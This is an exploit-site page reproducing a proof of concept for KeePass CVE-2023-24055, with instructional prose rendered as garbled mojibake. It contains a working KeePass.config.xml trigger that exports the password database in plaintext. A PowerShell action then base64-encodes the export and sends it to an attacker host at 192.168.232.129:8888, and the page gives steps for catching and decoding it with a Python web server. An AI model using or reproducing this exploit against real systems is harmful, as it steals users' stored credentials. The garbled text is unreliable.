Sploitus

Exploit for KeePass

kitploit ┬╖ 2026-08-28

Exploit Code

MARKDOWN87 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZWLSIX-KEEPASS-CVE-2023-24055
# KeePass-CVE-2023-24055

KeePass CVE-2023-24055 рдХрд╛ рдкреБрдирд░реБрддреНрдкрд╛рджрди KeePass CVE-2023-24055 рдХрд╛ рдкреБрдирд░реБрддреНрдкрд╛рджрди

1, рдорд╢реАрди рддреИрдпрд╛рд░ рдХрд░реЗрдВ: kali (192.168.232.129), windows10 (192.168.232.128)

2, KeePass рд╕рдВрд╕реНрдХрд░рдг: 2.53

![рдЪрд┐рддреНрд░ 1](https://raw.githubusercontent.com/zwlsix/KeePass-CVE-2023-24055/main/image/%E5%9B%BE%E7%89%871.png)

2, рд╕рд┐рджреНрдзрд╛рдВрдд: KeePass рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдлрд╝рд╛рдЗрд▓ KeePass.config.xml рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдХреЗ, рдПрдХ рдЯреНрд░рд┐рдЧрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдЖрдЗрдЯрдо рдЬреЛрдбрд╝реЗрдВ: рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ рдФрд░ рдЙрдиреНрд╣реЗрдВ рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВ; рдЯреНрд░рд┐рдЧрд░ рдЬреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП XML рдХреЛрдб рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд╣реИ:

рдЗрд╕рдореЗрдВ: `<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>` рдлрд╝реАрд▓реНрдб рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рд░реНрдпрд╛рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реНрдерд╛рдиреАрдп рдкрде рд╕реЗрдЯ рдХрд░рддрд╛ рд╣реИ

рдкрд╛рд╡рд░рд╢реЗрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ GET рд╡рд┐рдзрд┐ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдлрд╝рд╛рдЗрд▓ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рдХрд░реЗрдВ

root@kitploit:~
    
    
    <Parameter>PowerShell.exe</Parameter>
    <Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
    

root@kitploit:~
    
    
    <Triggers>
    				<Trigger>
    					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
    					<Name>exploit</Name>
    					<Events>
    						<Event>
    							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
    							<Parameters>
    								<Parameter>0</Parameter>
    								<Parameter />
    							</Parameters>
    						</Event>
    					</Events>
    					<Conditions />
    					<Actions>
    						<Action>
    							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
    							<Parameters>
    								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
    								<Parameter>KeePass XML (2.x)</Parameter>
    								<Parameter />
    								<Parameter />
    							</Parameters>
    						</Action>
    						<Action>
    							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
    							<Parameters>
    								<Parameter>PowerShell.exe</Parameter>
    								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
    								<Parameter>False</Parameter>
    								<Parameter>1</Parameter>
    								<Parameter />
    							</Parameters>
    						</Action>
    					</Actions>
    				</Trigger>
    			</Triggers>
    

3, KeePass.config.xml рдлрд╝рд╛рдЗрд▓ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░реЗрдВ, XML рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдЖрдЗрдЯрдо рдЬреЛрдбрд╝реЗрдВ рдФрд░ рд╕рд╣реЗрдЬреЗрдВ (рдЬреЛрдбрд╝рдиреЗ рдХрд╛ рд╕реНрдерд╛рди: `<TriggerSystem></TriggerSystem>` рдЯреИрдЧ рдХреЗ рдЕрдВрджрд░), рдпрд╣ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП KeePass рдЦреЛрд▓реЗрдВ рдХрд┐ рдЬреЛрдбрд╝ рд╕рдлрд▓ рд░рд╣рд╛ рдпрд╛ рдирд╣реАрдВ:

![tu2](https://raw.githubusercontent.com/zwlsix/KeePass-CVE-2023-24055/main/image/%E5%9B%BE%E7%89%872.png)

4, рдХрд▓реА рдЦреЛрд▓реЗрдВ рдФрд░ рд╡реЗрдм рд╕реЗрд╡рд╛ рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдорд╛рдВрдб python3 -m http.server 8888 рдЪрд▓рд╛рдПрдБ, рддрд╛рдХрд┐ рдирд┐рд░реНрдпрд╛рдд рдХрд┐рдП рдЧрдП рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд┐рдП рдЬрд╛ рд╕рдХреЗрдВ

![tu3](https://raw.githubusercontent.com/zwlsix/KeePass-CVE-2023-24055/main/image/%E5%9B%BE%E7%89%873.png)

5, KeePass рдЦреЛрд▓реЗрдВ, рдПрдХ рдирдпрд╛ рд░рд┐рдХреЙрд░реНрдб рдмрдирд╛рдПрдБ рдФрд░ рд╕рд╣реЗрдЬреЗрдВ, рдЯреНрд░рд┐рдЧрд░ рд╕рдХреНрд░рд┐рдп рд╣реЛ рдЬрд╛рдПрдЧрд╛, рдХрд▓реА рджреНрд╡рд╛рд░рд╛ рдкреНрд░рд╛рдкреНрдд рд╕рд╛рдордЧреНрд░реА рджреЗрдЦреЗрдВ:

![tu4](https://raw.githubusercontent.com/zwlsix/KeePass-CVE-2023-24055/main/image/%E5%9B%BE%E7%89%874.png)

6, рд╕рд╛рдордЧреНрд░реА рдХреЛ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдХреЙрдкреА рдХрд░реЗрдВ, рдФрд░ base64 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбрд┐рдХреЛрдб рдХрд░реЗрдВ, рдлрд┐рд░ рд╕рд╛рджрд╛ рдкрд╛рда рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рд╣реЛрдЧрд╛

![tu5](https://raw.githubusercontent.com/zwlsix/KeePass-CVE-2023-24055/main/image/%E5%9B%BE%E7%89%875.png)

![tu6](https://raw.githubusercontent.com/zwlsix/KeePass-CVE-2023-24055/main/image/%E5%9B%BE%E7%89%876.png)

рд╕рдВрджрд░реНрдн рд▓реЗрдЦ: https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek